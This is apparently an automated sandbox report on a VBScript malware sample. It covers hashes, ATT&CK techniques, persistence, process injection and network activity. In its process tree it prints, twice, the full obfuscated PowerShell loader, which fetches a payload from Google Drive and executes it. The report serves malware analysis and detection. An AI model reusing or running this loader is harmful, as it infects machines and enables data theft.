3fa5856d8953d4693ed6caf9cb26d3e9b99d5a672b490e91e226ae06c766ac54

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
03/06/2024, 06:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

crypted.vbs
Size

1.1MB
MD5

b2f1fecda8bf0c6127eba0a1c753bab4
SHA1

a42be5a38938b46014c07a0f2e33ff98cc130ac5
SHA256

3fa5856d8953d4693ed6caf9cb26d3e9b99d5a672b490e91e226ae06c766ac54
SHA512

fd38551f3ad476cc9eb76ec35c99fb2f6199297d0dfd5c1ebe670e081d4a615f50d1ef4a1a1341857dab573aa92a65d5ed506442e6ca4acf0838c6c376630a48
SSDEEP

12288:431cvBzbU01qal638iNX3iTMgmuYtWN/ZgMiQPeRjI:4Yz64+2SjI

Score

8^/10

persistence

Malware Config

Signatures

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	certreq.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\J20H3FUXM = "C:\\Program Files (x86)\\windows mail\\wab.exe"	certreq.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	676	powershell.exe
13	676	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
40	drive.google.com
8	drive.google.com
9	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2576	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3828	powershell.exe
2576	wab.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3828 set thread context of 2576	3828	powershell.exe	100
PID 2576 set thread context of 3424	2576	wab.exe	56
PID 2576 set thread context of 544	2576	wab.exe	104
PID 544 set thread context of 3424	544	certreq.exe	56
PID 544 set thread context of 1288	544	certreq.exe	112

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	certreq.exe

Suspicious behavior: EnumeratesProcesses 53 IoCs

pid	Process
676	powershell.exe
676	powershell.exe
3828	powershell.exe
3828	powershell.exe
3828	powershell.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
2576	wab.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
3828	powershell.exe
2576	wab.exe
3424	Explorer.EXE
3424	Explorer.EXE
544	certreq.exe
544	certreq.exe
544	certreq.exe
544	certreq.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	676	powershell.exe
Token: SeDebugPrivilege	3828	powershell.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3424	Explorer.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 3100 wrote to memory of 676	3100	WScript.exe	82
PID 3100 wrote to memory of 676	3100	WScript.exe	82
PID 676 wrote to memory of 4592	676	powershell.exe	84
PID 676 wrote to memory of 4592	676	powershell.exe	84
PID 676 wrote to memory of 3828	676	powershell.exe	94
PID 676 wrote to memory of 3828	676	powershell.exe	94
PID 676 wrote to memory of 3828	676	powershell.exe	94
PID 3828 wrote to memory of 4336	3828	powershell.exe	97
PID 3828 wrote to memory of 4336	3828	powershell.exe	97
PID 3828 wrote to memory of 4336	3828	powershell.exe	97
PID 3828 wrote to memory of 2576	3828	powershell.exe	100
PID 3828 wrote to memory of 2576	3828	powershell.exe	100
PID 3828 wrote to memory of 2576	3828	powershell.exe	100
PID 3828 wrote to memory of 2576	3828	powershell.exe	100
PID 3828 wrote to memory of 2576	3828	powershell.exe	100
PID 3424 wrote to memory of 544	3424	Explorer.EXE	104
PID 3424 wrote to memory of 544	3424	Explorer.EXE	104
PID 3424 wrote to memory of 544	3424	Explorer.EXE	104
PID 544 wrote to memory of 1288	544	certreq.exe	112
PID 544 wrote to memory of 1288	544	certreq.exe	112

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3424
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\crypted.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Flyvercertifikatet = 1;Function Kindergarten($Orgament){$Dissektionsstue=$Orgament.Length-$Flyvercertifikatet;$Ordensmagterne='Substring';For( $Snebrrenes=7;$Snebrrenes -lt $Dissektionsstue;$Snebrrenes+=8){$Mousemill115+=$Orgament.$Ordensmagterne.Invoke( $Snebrrenes, $Flyvercertifikatet);}$Mousemill115;}function Stormtight63($Disponering){ & ($Determinating) ($Disponering);}$Terraced=Kindergarten 'DomestiMAnkelseo Aabe.bzVinniduiMenjah l ,ovedvlSortsreaBrayefr/Nonesur5 verfr.Plnekli0Longl.n Gawain (StttevvWKeratoii.onphrenSangfugd ,ngratoTvangfrwBrownbus Ligni, SolidarN SemnonTProcess Alpelan1comi,oc0genials.Substan0Exterri;Roentge Coddle.WGiftendiAnotusanValutah6Drawlyf4Outtowe;Frprisr LeoparxGladlie6Fo.egif4 mmana;Kon.ess Boi err Blads,vR,psbin:Miscolo1 Embonp2Kwartas1Stethop.H,ggadi0Akv rie)Buestrg PersulGCoharmoeSamuraic Un inik cen.oroUndecen/In.orni2noncorr0 Biblio1 Skamfu0Ko,pora0transl 1jamb re0Aabenba1Reg.ner jacquarFStorstaiMennue r,onesoteKnoj,rnf grilleoHumptysxMultipl/Besgene1Drought2Perineo1Und cay.Inexpug0Beskygg ';$Woollies=Kindergarten 'BorgerfU Ocul,msBeslagle Ne.etsr Komman-O.gldenAThera eg bahut.eAnslagsnTrafikhtO.gelby ';$Unforgiveness=Kindergarten ' Sympath Verbost,esolattfoelgerpbanan.tsOsirian:Mystik,/Samme.b/AflaastdVer,ensrYahrzeii Rapp,evAnterope Komple.FasciodgportlasoBefrienoRepenfogOvermttlMollifieImporty.IdolouscTelevisoEstray mKrydsre/pifteneubucksubcNoncart?redekameEntomb,xUgebla p FjolleoVen,isfrAmoe,idtHaemocy=FyrrenadGreerh,oS,ytkirwStenvggnKarrigsl k,ppenotidssvaaOutpartdLimonit&Azohumii Controd.upplem=Iso.las1NondeodpTelefonM anstteDFletfilE E,noloJAutotekfInflatoXOrthochyBlodfo.zMultimeg Frav.gyThgerhadPupperueUdskilnGYardarm_Rentede1Risi.ofx,aigaspAVenialkgTor.ediV UnwittkVirerneJ,evivaluflyve k0Boligti1Stambge3Tykmlks1Ube.gelzLeefja 8L,ljaopp.ofleveS DatabaVLadysli ';$kurvenes=Kindergarten ' .legma>Skydese ';$Determinating=Kindergarten ' .kiffei,gnersgeentringxNybblem ';$Slesvigernes100='Refigenens';$Laerebogen = Kindergarten 'SmrerieeC nsonacDistribhFjledeao,nequil Orthodo%LagtingaSlumrespPostth.pGuldnldd HolograKoppevatBoldspiaActiv.s%Infruct\AftnedeBZweckstiNedpljelUnacouslForfrdee Servomd F.lholeTange,trtrafficnAvisinte Copros.Oksest.BfaenusbuLabiallgPhalaro T mbrop& Vandpl&Hjdepun Tnder eNiv audcUnco,cehUnpa,cho Kasses Photo.otArturs, ';Stormtight63 (Kindergarten 'Rigsbib$DatakopgUncourtl squeggoMatriklbFore hoaBegraveldialekt:TankfulH BeredseMi wirif Phonemt DolleriMetepaplFor,fteyKendete= K.insm(AntimiscMavelanmInse.sidTempera ,usinkj/Cedrat.cProblem Austral$TricyklLFenyle aRigsstaeStewardrBall deeGarglerbStroemmo GinerngKrapyleeEditerin ajlefo)Fordyre ');Stormtight63 (Kindergarten 'Udveje,$ BlacklgAfskedslUnhomeloIndiciabStut era UdmarclSucc so: DominiA bijugor SvumnivDepu.ise ZophiapReinstirurbanizi,aldachn TutteksWoodcresBddelks=uninte.$OverrapU AchillnP.rsulpfKultureoScepterr Fjer ogUnruin ii devotvThri,tie Se.monnHurt gueS ittens lderp.sS utste.Sh.phersUr.litipSpeciallAabne uiFil,ematUndta.e( Social$Thurifek bservauMiljoebr FriborvJa.kwooeForkodnnposekigeSky.digs rocedu) Copart ');$Unforgiveness=$Arveprinss[0];$Anatomopathologic= (Kindergarten 'Onomato$IldslukgModesaglMacheteordnsedebSpeljvea etaratlMinueti: TraducS estearoAlfabe.p ,ropodhShimperiNonchalsStudehat,amqxsgiNonwondc emapho=KolprofN Salo neGrandfawOverl x-SlethugO PlaypebKonomigjAeroborePu hsticAbonnert Ind,nk InddtboSVenderey,epugnasYercumetUnope,ceD scentmN natom. ekstenNPro ogkeLngdernt Nephri. Spat iW katapueColumnibS.ovhugC Blge rlVenetiaicr,cifoeTilfr,enA cidiot');$Anatomopathologic+=$Heftily[1];Stormtight63 ($Anatomopathologic);Stormtight63 (Kindergarten 'Udkeled$Dep.ctoSEro,enooWithstap Hilst.h PalatoiPseudossLutterwtRubric.i.verstrc Huccat.RuskvejH iskote,elautoaUdgivesdPrimovie orgingrLadlesksretsins[Decemvi$VurderiWBlokbesoArcti.ooSteatoplomdispolOproer.iAgnersoeFjantetsSuperab]blankoc=Vallis,$MowableTImpleadeAmen.olrunoptiorAtom,praVk.elsec Lat.eueradiotedPrearms ');$Complexions=Kindergarten 'Han out$Asme,rrS Towneeo Tilf epOvergivhstangvgi estikusFladvantAmericai ,athwocDeligat.ginnersDMagazinoPr.voyawSocialmnA phitolAfrus.eoThistedaSpa.hawd uritanFErythroi Teks,ulFahrenheStreetw(Endamag$ProteinUGuruernnAlfionafCranklyo TtesagrNdringsgPremodeiIndterpv CombateKred.tonMigrneseBlodfatsV.ritissCubitoi,Brusked$.psprtnNfurendeo En,rewnRereward Wa dcoeS.gelsenKontaktsMiljbeseUnconge)Affran. ';$Nondense=$Heftily[0];Stormtight63 (Kindergarten 'Hesitat$ forvalgReceptulDilatatoMiddagebWorshipa iscrel Audien:t merplKGaffeldeCannibaeFoamie,lJ.nvippeStrisserSpidsbo=Welcome( myotrTSiluroieChemicksUdsvejftTusseru-TilbagePAmbassaaIm,umsctRepatrohBri nly Ansttel$ MainbrN Skoleko KolbasnHjemegndDominaneFordr.snImpri es AutopheP edege)D tanet ');while (!$Keeler) {Stormtight63 (Kindergarten 'Tourned$UncontegGorgerilAirm,iloSocialgb indiffaFilmmaglKookies:DeepeneGUniversoForvaskvC owdedeUdpantnr SingulnRen rykmFicti.neJagtshyn BarsletAfmnstraPanterslSporozoiSurferesSkattebmunmorbi=Hrev np$Fre.stdt SiddevrFracturu Avlshoe Brdsfu ') ;Stormtight63 $Complexions;Stormtight63 (Kindergarten 'SpaltefS ta.estt WavewiaMaalestrRouthyat Styrke- ,ogheaS Brusn,lMinimumeLotusseeSubventp Arbejd skrdder4Shampon ');Stormtight63 (Kindergarten ',oshest$idahdragComp etl Kerneoo SensefbSkemadsaNonflagl Me,alb:AnosmiaKFacetteeFoujda,eBar umslInsu aneU.derafrArctias= Br gge( CyclitTUnsturde.hogglesUncontrtInterna-TempereP,onsigna BesvantSplenomh Marine Prehen$FluxiliNDevotiooPlantetnBlotchidSubcasieTypeb,snPetaloisA,bejdse O,talk) Vers,o ') ;Stormtight63 (Kindergarten 'D takra$Go serig RenovalWealdsmochange,b Trspr aBgenonnlMen.esk:AfkalkeSDiscovetPilausheM,ntricd Embed.fOkapiibaPresleydMarishyeLandholrexophaseB sbeeinCo.pute=Fremtid$YttriumgamoeboblMa,inedoHjlp,mib Nau.icaKuldegylKaresse: StampuNshinenduM lieuapty,ogras InceptoBifagetnmatricu+Johnasm+ Ordreb% agters$EschatoAMudguarrIntox.cvPersiane Hjemmep EgyptorBortdsliTrumpetnPayboxhsfa,iscas tranqu.Regionpc Tredjeoex.endiu Com.lin SolsortJssesfu ') ;$Unforgiveness=$Arveprinss[$Stedfaderen];}$Lensgrevelige=301111;$Disambiguating=30264;Stormtight63 (Kindergarten ' aliter$Par,basgIntervilAtmiatroUroe,debEftermoaUnwor,ilParamec: KontorK ntikkr Lauhngo PurlgenFraidycuUnd.rtirsyphili2Plotted4Editeri Be.igt=Taareka Ledte.kG P ranueIagttagtBilater- usioneCStrengeoE,nsbesn ermigetAdresseeP adeskn dvrgpat Satiri Skjal.e$WartproNIlonetro,xcitabnundergrdTelefoneMarronsn Ka.ibrsGeodiateSalgsvr ');Stormtight63 (Kindergarten ' S.dame$ Hjspndg VerdiclImprisoo MotorkbRegnskaa KauderlPrusten:RaadeliB BerskieManoeuvnSpri.tabSolenesu,esolutk Be,alikM.rabuteSustenanBernieseParamer Dunst.r=Forplum Lsrefor[SteadfaSGo.nesey lueyhesSilkebotAnno ereMistr,tmRutebil.,auntinCShipmaso elasbnFejringvUdprinterenoncerSupinumtFib.isa]Dobbelt: Tekstm:Forskr.FUnoedvernegles,oEgritudmmanualiBGlobenracabern.s Trave.eSoubret6Prem ni4Prepos,SBrshajetP osphorP.raderi KastennValg,agg Hydros(Interna$HexdracK,vivaler Udvik o F,avnnnCitifyiuMonisterBabbitt2Postica4moosewe) Martyr ');Stormtight63 (Kindergarten 'Konstru$Re levigSpradeblNonirrao ,nguilbHandsf,a ConeyklSkatt.s:GalgenfD VrvleheTandlgekSeacockl whitt,iGl,ssocnEnkeltva.ivieovtNitallei UgleseoPseudo nMurrnoneKamf rtr Arvebe1 P atte1e,zones4 gnora ops.aa=for.rig Phobism[ V,ldfaS chicneyVertimes Indstut S knineDeletegmSylihis.FremfrdTUdlufteest mmerx tremat Stra.f.ScribisE,dbollenSupinercDivideno RecorrdUnthinkiBelieflnBlawnhagLeasing]Enterop:Untrans:herskabA,soleriSUddanneCfd.elsdIToa uprIKnaphul.AbuleiaG funli,e Sa,chatCurrie S vandfotCounterrOleometiOplysninmg,ingegSi kerh( E hisb$PaucipiB VirilieFortsatnSpartlebSpecia.uCrepusck ilfrsekPrecheceAcrockonAlfer peSabaeis)Natio a ');Stormtight63 (Kindergarten 'Diapsid$Sten.ldgPos,entlUncostuoEpentheb FllessaUndevell euphor:SkarkseFTartareoInspicetSc,urinoBicycleg Carpogr uglereahypnotifGravhuniPr,chloeDome,tirUnefful=Turi.tb$UdlaanvD.rineskeLeveal kGavltaglAren,siiRversmin Akkre,a FravrstAmericaiGaa.sdaoS ookprnPollenje Dilu,orMjavede1Squill,1 G,andd4Hogmana.KalibresHornstruBlokke.bAtrochosFormid tPedaliarSek sopiLe,ticenDo.inergUnderdo(.resier$RegulatL Alimene Tri,penH,rliges TestsigDigitalr MajorieKastanjv Sluk,ieSa.frerl omikkei Bevessg BoligfeBruskbo,Angloma$SaussurDSpiremeiWizard,sPsycho.aForhaanmUndsigebHensigtiVanskelgPrefer.u Ufortjaimmin,nt klipseiSupin,tnI,adesmgUdetill)I mense ');Stormtight63 $Fotografier;"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:676
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Billederne.Bug && echo t"
      4⤵
      PID:4592
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Flyvercertifikatet = 1;Function Kindergarten($Orgament){$Dissektionsstue=$Orgament.Length-$Flyvercertifikatet;$Ordensmagterne='Substring';For( $Snebrrenes=7;$Snebrrenes -lt $Dissektionsstue;$Snebrrenes+=8){$Mousemill115+=$Orgament.$Ordensmagterne.Invoke( $Snebrrenes, $Flyvercertifikatet);}$Mousemill115;}function Stormtight63($Disponering){ & ($Determinating) ($Disponering);}$Terraced=Kindergarten 'DomestiMAnkelseo Aabe.bzVinniduiMenjah l ,ovedvlSortsreaBrayefr/Nonesur5 verfr.Plnekli0Longl.n Gawain (StttevvWKeratoii.onphrenSangfugd ,ngratoTvangfrwBrownbus Ligni, SolidarN SemnonTProcess Alpelan1comi,oc0genials.Substan0Exterri;Roentge Coddle.WGiftendiAnotusanValutah6Drawlyf4Outtowe;Frprisr LeoparxGladlie6Fo.egif4 mmana;Kon.ess Boi err Blads,vR,psbin:Miscolo1 Embonp2Kwartas1Stethop.H,ggadi0Akv rie)Buestrg PersulGCoharmoeSamuraic Un inik cen.oroUndecen/In.orni2noncorr0 Biblio1 Skamfu0Ko,pora0transl 1jamb re0Aabenba1Reg.ner jacquarFStorstaiMennue r,onesoteKnoj,rnf grilleoHumptysxMultipl/Besgene1Drought2Perineo1Und cay.Inexpug0Beskygg ';$Woollies=Kindergarten 'BorgerfU Ocul,msBeslagle Ne.etsr Komman-O.gldenAThera eg bahut.eAnslagsnTrafikhtO.gelby ';$Unforgiveness=Kindergarten ' Sympath Verbost,esolattfoelgerpbanan.tsOsirian:Mystik,/Samme.b/AflaastdVer,ensrYahrzeii Rapp,evAnterope Komple.FasciodgportlasoBefrienoRepenfogOvermttlMollifieImporty.IdolouscTelevisoEstray mKrydsre/pifteneubucksubcNoncart?redekameEntomb,xUgebla p FjolleoVen,isfrAmoe,idtHaemocy=FyrrenadGreerh,oS,ytkirwStenvggnKarrigsl k,ppenotidssvaaOutpartdLimonit&Azohumii Controd.upplem=Iso.las1NondeodpTelefonM anstteDFletfilE E,noloJAutotekfInflatoXOrthochyBlodfo.zMultimeg Frav.gyThgerhadPupperueUdskilnGYardarm_Rentede1Risi.ofx,aigaspAVenialkgTor.ediV UnwittkVirerneJ,evivaluflyve k0Boligti1Stambge3Tykmlks1Ube.gelzLeefja 8L,ljaopp.ofleveS DatabaVLadysli ';$kurvenes=Kindergarten ' .legma>Skydese ';$Determinating=Kindergarten ' .kiffei,gnersgeentringxNybblem ';$Slesvigernes100='Refigenens';$Laerebogen = Kindergarten 'SmrerieeC nsonacDistribhFjledeao,nequil Orthodo%LagtingaSlumrespPostth.pGuldnldd HolograKoppevatBoldspiaActiv.s%Infruct\AftnedeBZweckstiNedpljelUnacouslForfrdee Servomd F.lholeTange,trtrafficnAvisinte Copros.Oksest.BfaenusbuLabiallgPhalaro T mbrop& Vandpl&Hjdepun Tnder eNiv audcUnco,cehUnpa,cho Kasses Photo.otArturs, ';Stormtight63 (Kindergarten 'Rigsbib$DatakopgUncourtl squeggoMatriklbFore hoaBegraveldialekt:TankfulH BeredseMi wirif Phonemt DolleriMetepaplFor,fteyKendete= K.insm(AntimiscMavelanmInse.sidTempera ,usinkj/Cedrat.cProblem Austral$TricyklLFenyle aRigsstaeStewardrBall deeGarglerbStroemmo GinerngKrapyleeEditerin ajlefo)Fordyre ');Stormtight63 (Kindergarten 'Udveje,$ BlacklgAfskedslUnhomeloIndiciabStut era UdmarclSucc so: DominiA bijugor SvumnivDepu.ise ZophiapReinstirurbanizi,aldachn TutteksWoodcresBddelks=uninte.$OverrapU AchillnP.rsulpfKultureoScepterr Fjer ogUnruin ii devotvThri,tie Se.monnHurt gueS ittens lderp.sS utste.Sh.phersUr.litipSpeciallAabne uiFil,ematUndta.e( Social$Thurifek bservauMiljoebr FriborvJa.kwooeForkodnnposekigeSky.digs rocedu) Copart ');$Unforgiveness=$Arveprinss[0];$Anatomopathologic= (Kindergarten 'Onomato$IldslukgModesaglMacheteordnsedebSpeljvea etaratlMinueti: TraducS estearoAlfabe.p ,ropodhShimperiNonchalsStudehat,amqxsgiNonwondc emapho=KolprofN Salo neGrandfawOverl x-SlethugO PlaypebKonomigjAeroborePu hsticAbonnert Ind,nk InddtboSVenderey,epugnasYercumetUnope,ceD scentmN natom. ekstenNPro ogkeLngdernt Nephri. Spat iW katapueColumnibS.ovhugC Blge rlVenetiaicr,cifoeTilfr,enA cidiot');$Anatomopathologic+=$Heftily[1];Stormtight63 ($Anatomopathologic);Stormtight63 (Kindergarten 'Udkeled$Dep.ctoSEro,enooWithstap Hilst.h PalatoiPseudossLutterwtRubric.i.verstrc Huccat.RuskvejH iskote,elautoaUdgivesdPrimovie orgingrLadlesksretsins[Decemvi$VurderiWBlokbesoArcti.ooSteatoplomdispolOproer.iAgnersoeFjantetsSuperab]blankoc=Vallis,$MowableTImpleadeAmen.olrunoptiorAtom,praVk.elsec Lat.eueradiotedPrearms ');$Complexions=Kindergarten 'Han out$Asme,rrS Towneeo Tilf epOvergivhstangvgi estikusFladvantAmericai ,athwocDeligat.ginnersDMagazinoPr.voyawSocialmnA phitolAfrus.eoThistedaSpa.hawd uritanFErythroi Teks,ulFahrenheStreetw(Endamag$ProteinUGuruernnAlfionafCranklyo TtesagrNdringsgPremodeiIndterpv CombateKred.tonMigrneseBlodfatsV.ritissCubitoi,Brusked$.psprtnNfurendeo En,rewnRereward Wa dcoeS.gelsenKontaktsMiljbeseUnconge)Affran. ';$Nondense=$Heftily[0];Stormtight63 (Kindergarten 'Hesitat$ forvalgReceptulDilatatoMiddagebWorshipa iscrel Audien:t merplKGaffeldeCannibaeFoamie,lJ.nvippeStrisserSpidsbo=Welcome( myotrTSiluroieChemicksUdsvejftTusseru-TilbagePAmbassaaIm,umsctRepatrohBri nly Ansttel$ MainbrN Skoleko KolbasnHjemegndDominaneFordr.snImpri es AutopheP edege)D tanet ');while (!$Keeler) {Stormtight63 (Kindergarten 'Tourned$UncontegGorgerilAirm,iloSocialgb indiffaFilmmaglKookies:DeepeneGUniversoForvaskvC owdedeUdpantnr SingulnRen rykmFicti.neJagtshyn BarsletAfmnstraPanterslSporozoiSurferesSkattebmunmorbi=Hrev np$Fre.stdt SiddevrFracturu Avlshoe Brdsfu ') ;Stormtight63 $Complexions;Stormtight63 (Kindergarten 'SpaltefS ta.estt WavewiaMaalestrRouthyat Styrke- ,ogheaS Brusn,lMinimumeLotusseeSubventp Arbejd skrdder4Shampon ');Stormtight63 (Kindergarten ',oshest$idahdragComp etl Kerneoo SensefbSkemadsaNonflagl Me,alb:AnosmiaKFacetteeFoujda,eBar umslInsu aneU.derafrArctias= Br gge( CyclitTUnsturde.hogglesUncontrtInterna-TempereP,onsigna BesvantSplenomh Marine Prehen$FluxiliNDevotiooPlantetnBlotchidSubcasieTypeb,snPetaloisA,bejdse O,talk) Vers,o ') ;Stormtight63 (Kindergarten 'D takra$Go serig RenovalWealdsmochange,b Trspr aBgenonnlMen.esk:AfkalkeSDiscovetPilausheM,ntricd Embed.fOkapiibaPresleydMarishyeLandholrexophaseB sbeeinCo.pute=Fremtid$YttriumgamoeboblMa,inedoHjlp,mib Nau.icaKuldegylKaresse: StampuNshinenduM lieuapty,ogras InceptoBifagetnmatricu+Johnasm+ Ordreb% agters$EschatoAMudguarrIntox.cvPersiane Hjemmep EgyptorBortdsliTrumpetnPayboxhsfa,iscas tranqu.Regionpc Tredjeoex.endiu Com.lin SolsortJssesfu ') ;$Unforgiveness=$Arveprinss[$Stedfaderen];}$Lensgrevelige=301111;$Disambiguating=30264;Stormtight63 (Kindergarten ' aliter$Par,basgIntervilAtmiatroUroe,debEftermoaUnwor,ilParamec: KontorK ntikkr Lauhngo PurlgenFraidycuUnd.rtirsyphili2Plotted4Editeri Be.igt=Taareka Ledte.kG P ranueIagttagtBilater- usioneCStrengeoE,nsbesn ermigetAdresseeP adeskn dvrgpat Satiri Skjal.e$WartproNIlonetro,xcitabnundergrdTelefoneMarronsn Ka.ibrsGeodiateSalgsvr ');Stormtight63 (Kindergarten ' S.dame$ Hjspndg VerdiclImprisoo MotorkbRegnskaa KauderlPrusten:RaadeliB BerskieManoeuvnSpri.tabSolenesu,esolutk Be,alikM.rabuteSustenanBernieseParamer Dunst.r=Forplum Lsrefor[SteadfaSGo.nesey lueyhesSilkebotAnno ereMistr,tmRutebil.,auntinCShipmaso elasbnFejringvUdprinterenoncerSupinumtFib.isa]Dobbelt: Tekstm:Forskr.FUnoedvernegles,oEgritudmmanualiBGlobenracabern.s Trave.eSoubret6Prem ni4Prepos,SBrshajetP osphorP.raderi KastennValg,agg Hydros(Interna$HexdracK,vivaler Udvik o F,avnnnCitifyiuMonisterBabbitt2Postica4moosewe) Martyr ');Stormtight63 (Kindergarten 'Konstru$Re levigSpradeblNonirrao ,nguilbHandsf,a ConeyklSkatt.s:GalgenfD VrvleheTandlgekSeacockl whitt,iGl,ssocnEnkeltva.ivieovtNitallei UgleseoPseudo nMurrnoneKamf rtr Arvebe1 P atte1e,zones4 gnora ops.aa=for.rig Phobism[ V,ldfaS chicneyVertimes Indstut S knineDeletegmSylihis.FremfrdTUdlufteest mmerx tremat Stra.f.ScribisE,dbollenSupinercDivideno RecorrdUnthinkiBelieflnBlawnhagLeasing]Enterop:Untrans:herskabA,soleriSUddanneCfd.elsdIToa uprIKnaphul.AbuleiaG funli,e Sa,chatCurrie S vandfotCounterrOleometiOplysninmg,ingegSi kerh( E hisb$PaucipiB VirilieFortsatnSpartlebSpecia.uCrepusck ilfrsekPrecheceAcrockonAlfer peSabaeis)Natio a ');Stormtight63 (Kindergarten 'Diapsid$Sten.ldgPos,entlUncostuoEpentheb FllessaUndevell euphor:SkarkseFTartareoInspicetSc,urinoBicycleg Carpogr uglereahypnotifGravhuniPr,chloeDome,tirUnefful=Turi.tb$UdlaanvD.rineskeLeveal kGavltaglAren,siiRversmin Akkre,a FravrstAmericaiGaa.sdaoS ookprnPollenje Dilu,orMjavede1Squill,1 G,andd4Hogmana.KalibresHornstruBlokke.bAtrochosFormid tPedaliarSek sopiLe,ticenDo.inergUnderdo(.resier$RegulatL Alimene Tri,penH,rliges TestsigDigitalr MajorieKastanjv Sluk,ieSa.frerl omikkei Bevessg BoligfeBruskbo,Angloma$SaussurDSpiremeiWizard,sPsycho.aForhaanmUndsigebHensigtiVanskelgPrefer.u Ufortjaimmin,nt klipseiSupin,tnI,adesmgUdetill)I mense ');Stormtight63 $Fotografier;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3828
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Billederne.Bug && echo t"
        5⤵
        
        PID:4336
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2576
- C:\Windows\SysWOW64\certreq.exe
  "C:\Windows\SysWOW64\certreq.exe"
  2⤵
  - Adds policy Run key to start application
  - Suspicious use of SetThreadContext
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:544
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:1288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Beachless.txt

Filesize
4KB

MD5
f6e95085669c276400c88462f22cb873

SHA1
3de4332aa410d4a036d344fef54aa1557e77b989

SHA256
27b15730d2204ff55f5b568986e8f73f6a6480ffc4aae5a19a925de38b8b8f17

SHA512
